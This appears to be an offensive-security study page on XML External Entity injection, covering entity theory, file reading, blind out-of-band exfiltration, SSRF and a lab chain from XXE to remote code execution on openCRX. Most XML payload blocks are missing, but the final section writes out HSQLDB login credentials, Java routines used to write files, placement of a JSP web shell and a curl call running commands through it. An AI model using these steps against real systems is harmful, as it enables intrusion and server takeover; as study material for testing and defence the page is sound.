XML External Entity (XXE) Injection
XML is designed to encode data in a way that’s easier for humans and machines to read. The layout of an XML document is somewhat similar to an HTML document, although there are differences in implementations.
An application that relies on data stored in the XML format will inevitably make use of an XML parser or processor. The application calls this component when XML data needs to be processed. XML processors can suffer from different types of vulnerabilities originating from malformed or malicious input data (Information Disclosure, Server-Side Request Forgery, Denial of Service, Remote Command Injection).
Theory
- XML Entities in DTDs
DTDs can declare XML entities in XML documents.
XML entities are data structures containing XML code referenced multiple times.
Three types of XML entities: internal, external (private and public), and parameter.
Internal Entities:
Locally defined
Format: <!ENTITY name "entity_value">
Example: <!ENTITY test "<entity-value>test value</entity-value>">
External Entities:
Used for referencing data not defined locally.
Private external entity format: <!ENTITY name SYSTEM "URI">
Example of private external entity: <!ENTITY hola SYSTEM "http://www.example.com/company.xml">
Public external entity format: <!ENTITY name PUBLIC "public_id" "URI">
Example of public external entity: <!ENTITY hola PUBLIC "-//W3C//TEXT companyinfo//EN" "http://www.example.com/companyinfo.xml">
Parameter Entities:
Exist only within DTDs.
Format: <!ENTITY % name SYSTEM "URI">
Example: <!ENTITY % course 'AWAE'>, <!ENTITY Title 'Offensive Security presents %course;' >
Unparsed External Entities:
XML entities can contain non-XML data.
Use NDATA declaration to prevent XML parser processing.
Format for public and private external entities: <!ENTITY name SYSTEM "URI" NDATA TYPE> or <!ENTITY name PUBLIC "public_id" "URI" NDATA TYPE>.
Allows access to binary content, useful in web application environments lacking I/O stream manipulation flexibility.
- XML External Entity (XXE) injection is an attack against XML parsers
Attacker forces the XML parser to process external entities.
Can lead to disclosure of confidential information.
Requires maliciously-crafted XML request with system identifiers pointing to sensitive data.
Can be used to exfiltrate data, including binary content.
Depending on the application's programming language and protocol wrappers, may lead to command injection.
In some languages like PHP, XXE can result in remote code execution.
- Finding the Attack Vector
Demonstrates XXE attack with examples.
XML parser replaces entity reference with entity's value.
Changing an internal entity to an external entity referencing a file on the server can lead to reading server files.
Vulnerable parsers load file contents and place them in the XML document.
XXE payload should be injected into a field displayed in the web application.
Suggested target: Accounts page with XML input, where XXE payloads can be used in text fields to observe attack results in the web application.
XXE to retrieve files or obatain data
To perform an XXE injection attack that retrieves an arbitrary file from the server's filesystem, you need to introduce (or edit) a DOCTYPE element that defines an external entity containing the path to the file, or edit a data value in the XML that is returned in the application's response, to make use of the defined external entity.
- No Defenses Applied from the App
Normal Request:
Payload:
- XInclude to retrieve files
Some applications receive client-submitted data, embed it on the server-side into an XML document, and then parse the document. In this situation, we cannot carry out a classic XXE attack, because you don't control the entire XML document and so cannot define or modify a DOCTYPE element. However, you might be able to use XInclude instead. XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.
To perform an XInclude attack, you need to reference the XInclude namespace and provide the path to the file that you wish to include. For example:
- XXE attacks via modified content type
Most POST requests use a default content type that is generated by HTML forms, such as application/x-www-form-urlencoded. Some web sites expect to receive requests in this format but will tolerate other content types, including XML.
For example, if a normal request contains the following:
Then you might be able submit the following request, with the same result:
If the application tolerates requests containing XML in the message body, and parses the body content as XML, then you can reach the hidden XXE attack.
- XXE via image file upload
Create a local SVG image with the following content:
Upload that image, then, when you view your comment/avatar/image, you should see the contents of the /etc/hostname file in your image.
- Blind XXE with out-of-band (OOB) interaction
First, the declaration of an XML parameter entity includes the percent character before the entity name:
And second, parameter entities are referenced using the percent character instead of the usual ampersand:
If you try this and others xml injections and doesn't work we should try an XXE OOB charging an external URL (Burp Collaborator, Ngrok, …):
If nothing is shown but we receive a hit in the server, then it is a Blind XXE with out-of-band (OOB) interaction.
Now from here, for example, we can upload a malicious dtd from the subdomain server.
- Blind XXE to exfiltrate data using a malicious external DTD
First, we create a malicious DTD:
Then, we put the url direction to the server where we have the malicious dtd:
Then we have to base64 decode the info:
echo "{blow received}" | base64 -d; echo
- Blind XXE to retrieve data via error messages
An alternative approach to exploiting blind XXE is to trigger an XML parsing error where the error message contains the sensitive data that you wish to retrieve.
You can trigger an XML parsing error message containing the contents of the /etc/passwd file using a malicious external DTD as follows:
Then we should invoke it like in Blind XXE with out-of-band (OOB) interaction, this will result in an error message revealing the target file.
- Blind XXE by repurposing a local DTD
Out-of-band connections are blocked, so this attack involves invoking a DTD file that happens to exist on the local filesystem and repurposing it to redefine an existing entity in a way that triggers a parsing error containing sensitive data.
First, we have to locate an existing DTD file to repurpose. We can test common DTD files to locate a file that is present, to locate it:
Then, we need to obtain a copy of the file and review it to find an entity that we can redefine. Since many common systems that include DTD files are open source, you can normally quickly obtain a copy of files through internet search.
For example, suppose there is a DTD file on the server filesystem at the location /usr/local/app/schema.dtd, and this DTD file defines an entity called custom_entity. An attacker can trigger an XML parsing error message containing the contents of the /etc/passwd file by submitting a hybrid DTD like the following:
Information Disclosure
- File Reading
Use a POST request to /account with "application/xml" as the request body format.
Inspect sample objects in the model and find a simple example to use in the POST body.
Modify the POST request to include a simple DOCTYPE and ENTITY for testing.
Once we notice internal entities are being parsed successfully, we will attempt to use an external entity to reference a file on the server:
- Enumerate contents of directories
- Enumerate the whole server's file system through recursive XXE attack
- Script to cleanly display XXE attack results
- File Reading using CDATA Sections
Directly reading files via XXE can cause parser errors if the file contains XML-specific characters like "<
" and ">
".
The solution are CDATA Sections: XML's CDATA sections are used to ensure the parser treats file contents as text, not markup. CDATA sections start with <![CDATA[ and end with ]]>
.
First, create a malicious DTD in the attacker server:
sudo cat /var/www/html/wrapper.dtd
Now, update the payload to reference this DTD:
- Enumerate contents of directories using CDATA Sections
XXE to perform SSRF attacks
In this XXE+SSRF Attack once you discover trough SSRF Attack internal ports or internal Ips, you start the XXE attack:
XXE to RCE
- Tomcat and openCRX RCE through XXE and HSQLDB database access
First, XXE was exploited to read tomcat-users.xml for credentials but unable to leverage XXE for accessing Tomcat Manager due to role restrictions.
Using XXE we obtained directory listings, leading to the discovery of database-related files and credentials at /home/student/crx/data/hsqldb/
.
Then, we found JDBC connection string in dbmanager.sh file, indicating use of HSQLDB. The credentials username: sa and password: manager99 are found.
To check database accessibility:
nmap -p 9001 [server IP]
To connect to HSQLDB:
java -cp hsqldb.jar org.hsqldb.util.DatabaseManagerSwing --url jdbc:hsqldb:hsql://opencrx:9001/CRX --user sa --password manager99
Once in the database, Java Language Routines (JRTs) were used in HSQLDB, which serve to call Java static methods:
CREATE FUNCTION systemprop(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty'
Then, we will use the writeBytesToFilename method from com.sun.org.apache.xml.internal.security.utils.JavaUtils to write files to the server (convert payload to bytes using Burp Suite's Decoder tool):
CREATE PROCEDURE writeBytesToFilename(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024)) LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME 'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'
Then, create a JSP web shell to execute commands on the server (default kali jsp webshell at /usr/share/webshells/jsp/cmdjsp.jsp
):
call writeBytesToFilename('path/to/shell.jsp', cast ('[converted shell content]' AS VARBINARY(1024)))
call writeBytesToFilename(''../../apache-tomee-plus-7.0.5/apps/opencrx-coreCRX/opencrx-core-CRX/shell.jsp', cast ('[converted shell content]' AS VARBINARY(1024)))
Now, we can access the uploaded JSP shell via browser or curl:
curl http://opencrx:8080/path/to/shell.jsp?cmd=[command]
Last updated